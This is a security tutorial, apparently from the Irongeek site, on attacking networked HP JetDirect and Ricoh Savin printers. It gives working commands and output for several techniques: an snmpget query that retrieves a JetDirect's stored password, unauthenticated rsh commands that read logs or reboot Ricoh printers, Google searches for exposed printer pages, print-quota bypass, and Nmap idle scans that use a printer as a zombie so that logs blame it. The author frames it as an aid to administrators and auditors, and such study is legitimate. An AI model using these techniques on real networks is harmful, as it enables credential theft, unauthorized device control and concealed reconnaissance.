Hacking Network Printers
(Mostly HP JetDirects, but a little info on the Ricoh Savins)
By Adrian "Irongeek" Crenshaw
Hack a printer you say, what kind of toner have you been smoking, Irongeek? Well, I'm here to tell you, there's more that can be done with a printer to compromise network security than one might realize. In the olden days a printer may not have been much of a concern other than the threat from folks dumpster diving for hard copies of the documents that were printed from it, but many modern printers come network aware with embedded Operating Systems, storage and full IP stacks. This article will attempt to point out some of the more interesting things that can be done with a network based printer to make it reveal information about its users, owners and the network it's part of.
Some of this article may seem a little Black-hat as it concentrates more on the breaking-in than the keeping-out. However I feel this information will be useful to system administrators and auditors so that they know what sorts of things to look out for when it comes to network printers. If you want more advice on how to lock down your network printer visit your vendors web site. A guide from HP is linked at the bottom of this article for your convenience. If nothing else, this article may get you thinking in the right direction.
For my tests I will mostly be using a Hewlett-Packard LaserJet 4100 MFP (Fax/Printer/Copier/Scanner), an HP JetDirect 170x and a HP JetDirect 300X (J3263A) but I will also touch a bit on the Ricoh Savin series of printers lest you think HPs are the only network printers with security problems.
Much of this article will read like a huge brain dump, sort of disorganized and hazy like my mind. It all started as a project for Droop's Infonomicon TV and it snowballed from there with no specific direction. Bear with me as I clean it up and other folks send me new additions and suggestions to make this article more useful.
The most recent version of this article can be found at: http://www.irongeek.com/i.php?page=security/networkprinterhacking
Table of Contents:
There are several TLAs (Three letter acronyms) I will be using though out this article so I best get them out of the way now. PCL stands for Printer Control Language, which was developed by HP and has become one of the most common printer protocols. Another page description language you should be aware of is PostScript (PS) which was designed by Adobe to allow for more complicated things to be printed from a plotter/printer. PJL (Printer Job Language) is an extension of PCL that can tell a printer what to do, from changing device settings to transferring files. There are also three major network printing protocols you should be aware of. Here's a table with some of the pertinent information about each protocol:
Name | Meaning | Port |
LPD | Line Printer Daemon protocol | 515/tcp |
IPP aka Berkeley printing system |
Internet Printing Protocol | 631/tcp |
JetDirect aka AppSocket aka Raw aka PDL-datastream |
9100/tcp |
Since my focus is on
JetDirects I will mostly be talking about and using AppSocket/PDL-datastream, but
since many JetDirects can also work with IPP and LPD, and many non HP made
network printers also use AppSocket, you should be aware of the existence of all
three. There's are also network printers that use the IPX, Appletalk and SMB
(some Savins for example) protocols to communicate. I'll not cover IPX and
Appletalk because of my lack of experience with them, maybe someone else who
reads this page will submit some info on them for me to post (credit will be
given). SMB I may try to cover at a later time. Now that the formalities are out of the way, lets start playing
with printers.
The pictures above are of a external JetDirect 170x box. Notice the picture on the right; on the far right hand side you will notice a little button labeled "test". Pressing this button on most JetDirect boxes will print out a diagnostic page listing statistics and the IP setting for the JetDirect box. If your printer has an internal JetDirect card you will have to negotiate the menus to find out how to print this diagnostics page. Once you hit the test button the printer should print out a page or two that lists information like host name, MAC address, IP Address, subnet mask, default gateway, firmware revision and some general statistics. The IP/host name will be especially useful if you want to bypass print quota software by setting up direct IP printing on your Windows or Linux box. If you don't have physical access to the JetDirect box you can still find its IP or host name by seeing what its port is listed as if that network printer has been setup on a Windows box you have access to.
As you can see by the graphic on the left, the host name for this JetDirect box is npib1002c. Sometimes you will see a port listed as something like IP_192.168.1.102, where obviously 192.168.1.102 is the JetDirect's IP. You can pretty much use a host name or an IP interchangeably on your LAN, and if the host name has a fully qualified domain name you should be able to address it from the Internet as well.
If you don't have access to a JetDirect box, or if your PC is not connected to one, don't despair. In next few sections I will describe how to find these printers on the LAN/Internet using Nmap and JetAdmin.
I called this section Stupid Printer Tricks because while these activities aren't very technical, they do illustrate the simplicity of the RAW/AppSock protocol that listens on port 9100/tcp on JetDirects and most other network printers. Try this, find your printers IP using the Diagnostics page then web surf to:
http://your-printers-ip:9100
The ":9100" at the end is there to tell your browser to connect on port 9100/tcp. When you try to establish the connection you should notice that the browser does not go anywhere, this is because what's running on port 9100/tcp is not a web server. Click the stop button on your browser to tell it to stop trying to connect then go take a look at the printer. Depending on what browser you use you should see a print out something like one of the following:
Firefox | Internet Exploiter |
GET / HTTP/1.1 Host: tux:9100 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive |
GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) Host: test:9100 Connection: Keep-Alive |
You see, anything that the printer sees coming in on port 9100/tcp it tries to read as a print job. The two texts you see above are HTTP get requests for the root document of the server. The network printer does not understand this and just tries to print the request out as text. Another thing you can try is telneting to port 9100 (we will assume your printer's IP is 192.168.1.2), typing in some text, and seeing it print:
Irongeek:~#
telnet 192.168.1.2 9100 Trying 192.168.1.2... Connected to 192.168.1.2. Escape character is '^]'. hello printer ^] telnet> quit Connection closed. Irongeek:~# |
You should now see a print out that just has the words "hello printer" on it. The "^]" represents the pressing of the Control key and the ] bracket at the same time. The above example was done in *nix, but the same commands should work in Windows. Keep in mind you may not see all of what you type in (the parts in red) unless you have local echo turned on (which seems to be off by default in Windows).
There are exceptions to network printers just printing out everything sent to port 9100. This trick, for which there will be more details given later, should change LCD display to say what you want. It's not supported on all printers, but If you have an HP it should work. I've got to thank Dipswitch for pointing out that you don't need fancy tools or code to do it (but the tools do make it easier).
With Telnet:
Irongeek:~#$
telnet 192.169.1.2 9100 @PJL RDYMSG DISPLAY="Some Text" ^]quit Irongeek:#$ |
Or Netcat:
Irongeek:~#$
echo @PJL RDYMSG DISPLAY=\"Some Text\" |
netcat -q 0 192.168.1.2 9100 Irongeek:#$ |
Most of the time folks never even turn the JetDirect's password options on, but if they do they quickly find that they don't always work in logical ways.
If you are using a newer JetDirect box like one of the following:
680N (J6058A)
615N (J6057A)
610N (J4169A, J4167A)
380X (J6061A)
310X (J6038A,250M (J6042A)
75X(J6035A
or an HP printer with and internal JetDirect card like:
HP LaserJet 4100 series
HP LaserJet 8150 series
HP LaserJet 9000 series
HP Color LaserJet 4550 series
HP Color LaserJet 4600
HP Designjet 5000 series or HP Business Inkjet 2600
then the telnet and device password used by the Web interface and JetAdmin software are the same. If you telnet in you will be prompted for a user name and password. The user names "root", "admin", "administrator" and "supervisor" are all valid and equivalent.
If you are using an older JetDirect box like one of the following:
600N (J3110A, J3111A, J3112A, J3113A)
400N (J4100A, J4105A, J4106A)
300X
500X
170X(J3296A, J4101B, J3263A, J3264A, 3265A, J4102B, J3258B)
then things are more confusing. First, if you telnet in you will only be prompted for a password; no user name is asked for. If you setup a password for the telnet service it may not be the same password for the web interface, and vice versa. In other words there are two passwords on at least some JetDirect boxes, one for telneting into it and one for the web interface/JetAdmin software. Telnet password are case sensitive but Web/JetAdmin passwords are not. Telnet passwords are limited to 16 characters, Web/JetAdmin passwords to 12. Just so you know, Hijetter (discussed later) may report the password as disabled even if both passwords are set, but that's ok since it bypasses passwords anyway.
The Web interface and JetAdmin use SNMP (Simple Network Management Protocol) to control the JetDirect boxes and require that you know the password, but I've read that other third party SNMP configuration utilities will just ignore the password altogether and can connect and control the JetDirect anyway. It might be a good idea for some to change their SNMP community names to something other than the default public/private, but even if they do they could still be sniffed off of the wire unless they have a more recent JetDirect that supports SNMPv3 and SSL/TLS.
If you use the JetAdmin for Window 2000 desktop software be aware that it automatically stores passwords in the registry once you use it. For example, if the MAC address of a JetDirect box was 001083A2C913 then JetAdmin would store the password "password" in User\Software\Hewlett-Packard\HP JetAdmin\DeviceOptions\001083A2C913 in a value called "Access" as "50 00 41 00 53 00 53 00 57 00 4f 00 52 00 44,00,00,00". In case you don't notice it, this HEX string is the password "password" converted to all uppercase, with each letter turned to it's HEX equivalent, with a null character between each password character, and then null padded.
Brute forcing these passwords might be an option since logging on many network printers isn't all that involved. As you already know telnet is unencrypted so sniffing those passwords is trivial. As I found by sniffing with Ethereal, the web interface on older Jetdirects (really a Java applet) and JetAdmin use SNMP to configure the JetDirect box and also pass their password as plain text. Look for the password just before the string "=108" in the dumps. Some newer Jetdirects don't do this, and can use SSL to encrypt the connection.
If you set a password on a JetDirect box while you are playing around with it and forget what it is, all you have to do is a hard reset. Unplug the power cord, hold down the test/status button, and while still holding the button plug the power back in. The password and all of the other settings should now be cleared.
Getting a JetDirect password remotely using the SNMP vulnerability
I was cruising around SecurityFocus.com looking for JetDirect exploits and I came across a dooze:
http://www.securityfocus.com/bid/7001/exploit
Since the link above is rather shy on details I'll show you the exploit step by step. It seems that the device password for many JetDirects is stored in almost plain text and is accessible via SNMP using the read community name. Most folks leave their SNMP community name as "public" but even it has been change it's likely sniffable. Also try "internal" as the community name as this is the default write community name on many JetDirects. Reports are that on some JetDirects , even if you change the community name, "internal" will still work. With the Net-SNMP toolset the password is easy to recover:
Irongeek:~#
snmpget -v 1 -c public 192.168.2.46
.1.3.6.1.4.1.11.2.3.9.1.1.13.0 SNMPv2-SMI::enterprises.11.2.3.9.1.1.13.0 = Hex-STRING: 50 41 53 53 57 4F 52 44 3D 31 30 38 3B 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Irongeek:~# |
Notice the hex
string. In Hex 50=P,41=A,53=S,53=S,57=W,4F=0,52=R,44=D,3D==,31=1,30=0,38=8,3B=;
In other words, "PASSWORD=108;" which means the password is "PASSWORD". I also
tried it after changing the password to newpassword, and likewise "50 41 53 53
57 4F 52 44 3D 31 30 38 3B" is "NEWPASSWORD=108;". Anything
before the "=108;" is the password. For those too lazy to do the
HEX to ASCII conversion themselves check out:
http://nickciske.com/tools/hex.php
Also note that I entered my passwords in lowercase, but they were stored in uppercase. These passwords are case insensitive. Some of the vulnerable JetDirects are:
HP JetDirect J3263A
HP JetDirect J3113A
HP JetDirect J3111A
Other JetDirects may also be v\erle, so it's worth testing. I tried it with my Hewlett Packard HP JetDirect 300X (J3263A) and installing the latest firmware (H.08.49) seems to fix this problem but I imagine there are still a lot of un-patched JetDirects out there. Some print servers like the HP J3258A JetDirect 170X do not have user upgradeable firmware at all so you are stuck with the firmware they were shipped with. The only way to fix the vulnerability on them is to by a new JetDirect.
Controlling the JetDirect box with telnet/web browser
Most JetDirect boxes can be configured with a web browser or via a telnet session. Below you will see a screen show of the web base configuration tool. Just type the IP or host name of the JetDirect box into the address bar of your favorite Java enable web browser and it should work.
Here is an example of connecting to a JetDirect box with a telnet session, bringing up the help screen and resetting the host name:
Irongeek:~#
telnet 192.168.1.2 Trying 192.168.1.2... Connected to 192.168.1.2. Escape character is '^]'. HP JetDirect Please type "?" for HELP, or "/" for current settings > ? To Change/Configure Parameters Enter: Parameter-name: value <Carriage Return> Parameter-name Type of value ip: IP-address in dotted notation subnet-mask: address in dotted notation (enter 0 for default) default-gw: address in dotted notation (enter 0 for default) syslog-svr: address in dotted notation (enter 0 for default) idle-timeout: seconds in integers set-cmnty-name: alpha-numeric string (32 chars max) host-name: alpha-numeric string (upper case only, 32 chars max) dhcp-config: 0 to disable, 1 to enable allow: <ip> [mask] (0 to clear, list to display, 10 max) addrawport: <TCP port num> (<TCP port num> 3000-9000) deleterawport: <TCP port num> listrawport: (No parameter required) addstring: <name> <contents> contents - For non-printable characters use \xx for two digit hex number deletestring: <name> liststring: (No parameter required) addq: <name> [prepend] [append] [processing] prepend - The prepend string name append - The append string name Use NULL for no string processing - RAW, TEXT, or AUTO deleteq: <name> listq: (No parameter required) defaultq: <name> ipx/spx: 0 to disable, 1 to enable dlc/llc: 0 to disable, 1 to enable ethertalk: 0 to disable, 1 to enable banner: 0 to disable, 1 to enable Type passwd to change the password. Type "?" for HELP, "/" for current settings or "quit" to save-and-exit. Or type "exit" to exit without saving configuration parameter entries > / ===JetDirect Telnet Configuration=== Firmware Rev. : H.08.32 MAC Address : 00:60:b0:6d:47:c6 Config By : DHCP IP Address : 192.168.1.2 Subnet Mask : 255.255.255.0 Default Gateway : 192.168.1.1 Syslog Server : Not Specified Idle Timeout : 90 Seconds Set Cmnty Name : Not Specified Host Name : NPI6D47C6 DHCP Config : Enabled Passwd : Disabled IPX/SPX : Enabled DLC/LLC : Enabled Ethertalk : Enabled Banner page : Enabled > host-name:BUTTMONKEY > / ===JetDirect Telnet Configuration=== Firmware Rev. : H.08.32 MAC Address : 00:60:b0:6d:47:c6 Config By : DHCP IP Address : 192.168.1.2 Subnet Mask : 255.255.255.0 Default Gateway : 192.168.1.1 Syslog Server : Not Specified Idle Timeout : 90 Seconds Set Cmnty Name : Not Specified Host Name : BUTTMONKEY DHCP Config : Enabled Passwd : Disabled IPX/SPX : Enabled DLC/LLC : Enabled Ethertalk : Enabled Banner page : Enabled > quit ===JetDirect Parameters Configured=== IP Address : 192.168.1.2 Subnet Mask : 255.255.255.0 Default Gateway : 192.168.1.1 Syslog Server : Not Specified Idle Timeout : 90 Seconds Set Cmnty Name : Not Specified Host Name : BUTTMONKEY DHCP Config : Enabled Passwd : Disabled IPX/SPX : Enabled DLC/LLC : Enabled Ethertalk : Enabled Banner page : Enabled User Quitting Connection closed by foreign host. Irongeek:~# |
Important note about using telnet to configure a JetDirect box: You must use the "quit" command to end your session if you want your changes to be saved. If you just kill the telnet terminal all of the changes you made during the session will be lost.
RSH commands and Richo Savin Aficio Printers
I've got to thank Mslaviero for introducing me to this aspect of Richo Savin printers. Check out his site:
http://www.cs.up.ac.za/cs/mslaviero/archives/2005/04/28/ricoh-afficio-2035-security-or-lack-thereof/
Normally you might
want to login to your Savin with telnet, but it's likely password protected (the
default password is "password" on some Savins). Don't fear, there is another way
you may be able to execute some commands on the printer. You may have noticed
from an Nmap scan that your Richo Savin has port 514/tcp open. Guess what? You
can use the rsh *nix utility to execute commands remotely on the box. First you
will want to make sure you have the rsh client installed. Rsh has largely been
depreciated because of it's unencrypted connections and other security problems.
If you try rsh on you Linux box it will likely try to use SSH automatically
instead, which won't work. If you have a Debian based distribution install
rsh-client (apt-get install rsh-client) and try out some of these commands to
gather more information from your Savin printer:
The Info command will list the printers current configuration and supported options"
root@Irongeek:~#
rsh 192.168.1.2 info (Input Tray) No. Name Page Size Status ------------------------------------------------------------------------------- 1 Tray 1 11 x 8 1/2" PaperEnd. 2 Tray 2 11 x 8 1/2" Normal. 3 LCT 11 x 8 1/2" Normal. 4 Bypass Tray 11 x 8 1/2" PaperEnd. (Output Tray) No. Name Status ------------------------------------------------------------------------ 1 Internal Tray 1 Normal. 2 Finisher Upper Tray Normal. 3 Finisher Shift Tray Normal. (Printer Language) No. Name Version -------------------------------------------------------- 1 Automatic Language Switching 2.21.5.3 2 Customized PJL 2.21.5.3 3 RPCS 2c.9.5a 4 PCL 5e Emulation 1.01 5 PCL XL Emulation 1.01 6 Adobe PostScript 3 1.02 |
Stats gives you system stats (duh) :
root@Irongeek:~# rsh 192.168.1.2 stat Printer status : Printing.(Ready.) Online/Offline : Online. Rank Owner Job Files Total Size active anonymous 2491 (standard input) 126980 bytes |
The syslog command will return information such as the version, wins server of the network, what daemons were started and other bits of info:
root@Irongeek:~# rsh
192.168.1.2 syslog #[ncsd(17)]06/02/24 07:16:18 RICOH Aficio 2045e 2.40 INFO: #[ncsd(17)]06/02/24 07:16:18 Network Control Service 4.12 INFO: #[ncsd(17)]06/02/24 07:16:18 Copyright (C) 1994-2002 RICOH CO.,LTD. INFO: #[ncsd(17)]06/02/24 07:16:19 Ethernet started with IP: 192.168.1.2 INFO: #[inetd(42)]06/02/24 07:16:19 inetd start. INFO: #[snmpd(43)]06/02/24 07:16:19 Snmpd Start. INFO: #[httpd(44)]06/02/24 07:16:19 httpd start. INFO: #[ncsd(17)]06/02/24 07:16:19 Current Interface Speed : 100Mbps(full-duplex) INFO: #[nbtd(45)]06/02/24 07:16:19 nbtd start. INFO: #[nbtd(45)]06/02/24 07:16:19 Name registration success. WINS Server=192.168.30.100 NetBIOS Name=RNP82398B (Ethernet) INFO: #[nbtd(45)]06/02/24 07:16:19 Name registration success. WINS Server=192.168.30.100 NetBIOS Name=IGPrinter (Ethernet) INFO: #[nbtd(45)]06/02/24 07:16:19 Name registration success. WINS Server=192.168.30.100 NetBIOS Name=WORKGROUP (Ethernet) INFO: #[multid(48)]06/02/24 07:16:21 multid start. INFO: #[diprintd(51)]06/02/24 07:16:21 started. INFO: #[lpd(52)]06/02/24 07:16:21 restarted INFO: #[snmpd(43)]06/02/24 07:16:28 Snmp over ip is ready. INFO: #[httpd(44)]06/02/24 07:16:28 ipp enable. INFO: #[httpd(44)]06/02/24 07:16:28 nrs disable. INFO: #[lpd(52)]06/03/06 22:19:28 bad request (71) from WARNING: #[lpd(52)]06/03/06 22:19:28 Illegal service request ERR: #[lpd(52)]06/03/06 22:19:28 Lost connection ERR: #[rshd(2570)]06/03/06 22:19:33 192.168.19.56 can't connect second port: 65360 INFO: #[rshd(2596)]06/03/06 22:50:32 (192.168.19.56) help: Command not supported. ERR: |
Prnlog give you more information on recently print documents:
root@Irongeek:~# rsh 192.168.1.2 prnlog ID User Page Result Time -------------------------------------------------------- 2472 2 Finished 06/03/06 21:29 2473 10 Finished 06/03/06 21:33 2474 1 Finished 06/03/06 21:58 2475 19 Finished 06/03/06 21:59 2476 3 Finished 06/03/06 22:16 2477 4 Finished 06/03/06 22:16 2478 2 Finished 06/03/06 22:17 2479 4 Finished 06/03/06 22:19 2480 5 Finished 06/03/06 22:22 2481 3 Finished 06/03/06 22:24 2482 2 Finished 06/03/06 22:29 2483 2 Finished 06/03/06 22:35 2484 1 Finished 06/03/06 22:37 2485 2 Finished 06/03/06 22:38 2486 2 Finished 06/03/06 22:38 2487 2 Finished 06/03/06 22:40 2488 6 Finished 06/03/06 22:40 2489 2 Finished 06/03/06 22:45 2490 4 Finished 06/03/06 22:52 2491 30 Finished 06/03/06 22:53 |
Ps will list the currently running processes:
root@Irongeek:~# rsh 192.168.1.2 ps pid=2605 [rshd] pid= 57 [pcl] pid= 55 [rsp] pid= 52 [lpd] pid= 51 [diprintd] pid= 49 [centrod] pid= 48 [multid] pid= 47 [gps-web] pid= 46 [gps-pm] pid= 45 [nbtd] pid= 44 [httpd] pid= 43 [snmpd] pid= 42 [inetd] pid= 41 [mcsc] pid= 40 [meu] pid= 38 [plotter_sa] pid= 36 [shmlog] pid= 35 [copy] pid= 34 [gps] pid= 33 [scan] pid= 32 [nfa] pid= 31 [wdb] pid= 30 [pts] pid= 29 [websys] pid= 23 [nrs] pid= 21 [dcs] pid= 19 [ous] pid= 18 [ucs] pid= 17 [ncsd] pid= 16 [ecs] pid= 15 [mcs] pid= 14 [fcuh] pid= 13 [scs] pid= 12 [imh] pid= 3 [checker] pid= 2 [pagedaemon] pid= 1 [init] pid= 0 [swapper] |
The the print command prints whatever you tell it to on a sheet of paper (in this case just the word "test"):
root@Irongeek:~# rsh 192.168.1.2 print test root@Irongeek:~# |
Also try "rsh ip-address reboot" to see if you can reset the printer remotely (check syslog to see if it worked. Much the same information can be obtain by downloading files from the Savin printer's built in FTP server and reading them in a text editor. See the screen shot below:
Controlling and finding JetDirect boxes with JetAdmin
A nice tool Hewlett-Packard puts out for controlling JetDirect boxes is JetAdmin. Currently HP only offers a web version of the software, called appropriately enough Web JetAdmin, with versions for both Windows and Linux. Unfortunately you have to register on HP's site to get it, but you can download it without registering from this mirror site:
http://www.svrops.com/svrops/dwnldprog.htm
Personally I prefer the older HP JetAdmin for Window 2000 (v3.42, the last version to be released before it was discontinued but still works fine with XP) as it seems quicker and less bloated; however it may be missing some of the features of the newer Web JetAdmin. You can download the desktop version from:
http://www.helpdesk.umd.edu/os/windows_nt/printing/674/
JetAdmin is very fast at finding JetDirect boxes on your subnet since it does an SNMP broadcast to the network to locate them. Just right click and choose "Properties" to find more information about the JetDirect box, or choose "Modify" to bring up a wizard that lets you change the description, IP settings and other variables associated with the printer.
JetAdmin can also generate reports about the network printers it finds. JetAdmin can do too many things for me to describe them all in details here so go download it and try it out.
As a side note, if you want to find boxes on a network running Web JetAdmin ,do a ports scan for 8000/tcp (HTTP) and 8443/tcp (HTTPS); if it's password is weak or non-existent it's an easy way to control a network's printers. If you are interested in a JetAdmin like tool for the Ricoh Savin printers look into SmartDeviceMonitor.
Finding Network printers using Nmap and SNMP tools
Using Nmap from your Linux (preferable) or Windows box makes finding JetDirects and other network printers pretty easy. The Nmap commands I will be showing in this section are very simple and not very stealthy so you may want to consult the Nmap MAN page or a good Nmap tutorial for more ideas. You could use a simple Nmap command like:
nmap -A 192.168.1.*
to scan the range 192.168.1.1-255 for common ports and do an OS and version detect on the systems it finds. The output of the above command would look something like the following:
Irongeek:~#
nmap -A 192.168.1.* Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-08 15:12 EDT Interesting ports on igprinter (192.168.1.93): (The 1656 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 21/tcp open ftp HP JetDirect ftpd 23/tcp open telnet? 80/tcp open http HP Jetdirect httpd 280/tcp open http HP Jetdirect httpd 515/tcp open sdmsvc LANDesk Software Distribution (sdmsvc.exe) 631/tcp open http HP Jetdirect httpd 9100/tcp open jetdirect? Device type: printer|print server Running: HP embedded OS details: HP LaserJet printer/print server Nmap finished: 1 IP address (1 host up) scanned in 120.963 seconds Irongeek:~# |
There's one problem with the simple command shown above. If you are using a version of Nmap before 3.90 on some network printers it will create garbage print jobs with text like:
GET / HTTP/1.0
OPTIONS / HTTP/1.0
OPTIONS / RTSP/1.0
on each of the sheets printed, wasting a lot of paper. This happens because as Nmap scans for version detection on port 9100/tcp it sends some of the probe requests from the nmap-service-probes file to figure out what service is running on port 9100/tcp. Since the JetDirect box does not understand what it's being sent it just prints out the probes and you wind up with a bunch of garbage printed out. The easiest way to fix this is to upgrade to Nmap 3.90 or better, but barring that, there is a workaround. A better and faster solution might be to only probe for common network printer ports other than 9100 (Note: You may want to leave off -T insane for stealth/bandwidth reasons):
nmap -A -p 21,23,80,280,515,631 192.168.1.* -T insane
or maybe not use the -A (which is like doing a -sV -sO together) option at all and just use -sO to detect the OS that's running, but not send probes to the ports to find out the service versions are running.
While we are at it, it might be interesting to run a UDP scan on the JetDirect box as well.
Irongeek:~#
nmap -sU 192.168.1.* Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-11 06:21 EDT Interesting ports on 192.168.1.93: (The 1474 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 137/udp open|filtered netbios-ns 161/udp open|filtered snmp 427/udp open|filtered svrloc 32768/udp open|filtered omad MAC Address: 00:60:B0:6D:47:C6 (Hewlett-packard CO.) Nmap finished: 1 IP address (1 host up) scanned in 86.238 seconds Irongeek:~# |
As you can see we found quite a few ports to look into. I'll go over some of the things you can do with them in a bit. By the way, you may notice the NMB port 137/udb is open, which means you may be able to find printers on the LAN via the NetBIOS name service.
By the way, to find Ricoh Savins on the network you could use an Nmap command something like the following:
Irongeek:/#
nmap -A 192.168.1.3 -T insane Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-09 23:49 EDT Interesting ports on 192.168.1.3: (The 1656 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 21/tcp open ftp 23/tcp open telnet? 80/tcp open http? 514/tcp open shell? 515/tcp open printer lpd (error: Illegal service request) 631/tcp open ipp? 9100/tcp open jetdirect? 5 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== ...Omitted for security and space reasons... MAC Address: 00:00:74:80:7C:B8 (Ricoh Company) Device type: general purpose Running: NetBSD OS details: NetBSD 1.3I through 1.6 Uptime 6.506 days (since Sat Sep 3 11:42:37 2005) Nmap finished: 1 IP address (1 host up) scanned in 94.690 seconds Irongeek:/# |
Notice that the Ricoh Savins have a lot of the same ports open as the HP JetDirects, but that the the OS is detected as NetBSD (it will even run on your toaster).
Since many network printers respond to SNMP another great way to find them is to use an SNMP service scanning tool. Ricoh puts out a good tool for finding and configuring many network printers called SmartDeviceMonitor. SmartDeviceMonitor seems to miss some network printers that aren't Savins, but if you use Richo Savin Aficio printers on your network its a great tool for locating and polling them.
http://www.ricoh-usa.com/products/product_features.asp?pCategoryId=
19&pSubCategoryId=46&pCatName=Solutions&pSubCatName=
Device%20Management&pProductId=67&pProductName=SmartDeviceMonitor&tsn=Ricoh-USA
Foundstone's SNScan in another good choice:
http://www.foundstone.com/resources/proddesc/snscan.htm
or Softperfect's NetScan if you turn on the SNMP search options:
http://www.softperfect.com/products/networkscanner/
Another third way you could find network printers (if you are on the same subnet) is to use Nmap or Cain to do an ARP sweep and look for and boxes with a MAC address belonging to Hewlett Packard, Ricoh or another printer vendor. These are likely network printers.
Sometimes for convenience admins will put links to there printers' web interfaces on an Intranet site so they can easily admin them or pull off stored documents. Well, sometimes an Intranet is not really just an Intranet but accessible via the Internet. Google is a great way to find these printers. Here are a few search strings that may be of interest:
Ricoh Savins (Since these printer frequently store documents where to can be downloaded this can be a real killer for security)
intitle:"web image monitor"
"/web/user/en/websys/webArch/mainFrame.cgi"
inurl:"/en/sts_index.cgi"
HP Jetdirects (Varies greatly from model to model)
inurl:hp/device/this.LCDispatcher
CUPS Connected Printers
inurl:":631/printers" -php -demo
Try combining the above with the Google "site:" parameter to restrict the search to just certain organizations. For more information on Google Hacking visit http://johnny.ihackstuff.com and search their database of useful Google search strings for "Printers". I obtained some of the above search strings from Johnny's site.
Finding info about the printer using SNMP tools
Using the tools from http://net-snmp.sourceforge.net on a Linux box can yield a great deal of information about a network, assuming no firewalls are blocking the SNMP port (161/udp). The greatly truncated output below should give you some idea as to the kind of information you can get using snmpwalk, including other hosts on the same network, their IPs and MAC addresses and the features of the printer along with it's firmware revision. If you are using a Debian based distribution on Linux try the "apt-get install snmp" command to get these tools.
root@Cthulhu:~# snmpwalk -v 1 -c public 192.168.1.2
SNMPv2-MIB::sysDescr.0 = STRING: HP ETHERNET MULTI-ENVIRONMENT,ROM
H_06_01,JETDIRECT EX,JD34,EEPROM H.08.49 |
The above command works well on Jetdirects, Richo Savins and other common network printers that support SNMP. If you don't know the proper SNMP community name a quick sniff of the network with Ettercap or Dsniff should revel it to you iif the admin is using using SNMP version 1 or 2. Most times the community name will just be the default "public".
Using a JetDirect box as an Nmap Idlescan Zombie
While I'm on the topic of Nmap and JetDirect boxes, they make great bouncers for stealth Idle scans (also know as Zombie scans) since their IPIDs are incremental. Basically what happen is the Nmap scan is bounced off of the JetDirect box and any logs on the target will show the IP of the JetDirect box as being the attacker. There are a few problems with these kinds of scans, the biggest being that they are VERY slow. For more details on Idle scans see the following URL:
and the Nmap MAN page:
-sI <zombie host[:probeport]> Idlescan: This advanced scan method allows for a truly blind TCP port scan of the target (meaning no packets are sent to the target from your real IP address). Instead, a unique side-channel attack exploits predictable "IP frag- mentation ID" sequence generation on the zombie host to glean information about the open ports on the target. IDS systems will display the scan as coming from the zombie machine you specify (which must be up and meet certain criteria). I wrote an informal paper about this technique at http://www.inse- cure.org/nmap/idlescan.html . Besides being extraordinarily stealthy (due to its blind nature), this scan type permits mapping out IP-based trust relationships between machines. The port listing shows open ports from the perspective of the zombie host. So you can try scanning a target using various zombies that you think might be trusted (via router/packet filter rules). Obviously this is crucial information when prioritizing attack targets. Otherwise, you penetration testers might have to expend considerable resources "owning" an intermediate system, only to find out that its IP isn't even trusted by the target host/network you are ultimately after. You can add a colon followed by a port number if you wish to probe a particular port on the zombie host for IPID changes. Otherwise Nmap will use the port it uses by default for "tcp pings". |
Here is an example of Nmap being run using a JetDirect box as a bouncer. I've used the -P0 option so that the host running Nmap does not ping the target first, lessening the stealth value by giving away the scanners true IP.
Irongeek:~#
nmap -P0 -sI
192.168.1.93 Irongeek.irongeek.com Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-08 17:22 EDT Idlescan using zombie 192.168.1.93 (192.168.1.93:80); Class: Incremental Interesting ports on 192.168.1.5: (The 1654 ports scanned but not shown below are in state: closed|filtered) PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 587/tcp open submission Nmap finished: 1 IP address (1 host up) scanned in 35.262 seconds Irongeek:~# |
Now, if 192.168.1.5 looks at its logs it will appear that 192.168.1.93 (the JetDirect box) was doing the scan. Sneaky!
Setting up a direct IP printer in Windows and Linux
Setting up a direct IP printer can be useful from time to time; here are a few reasons why you might want to set up one up:
1. Your main print server is unreliable.
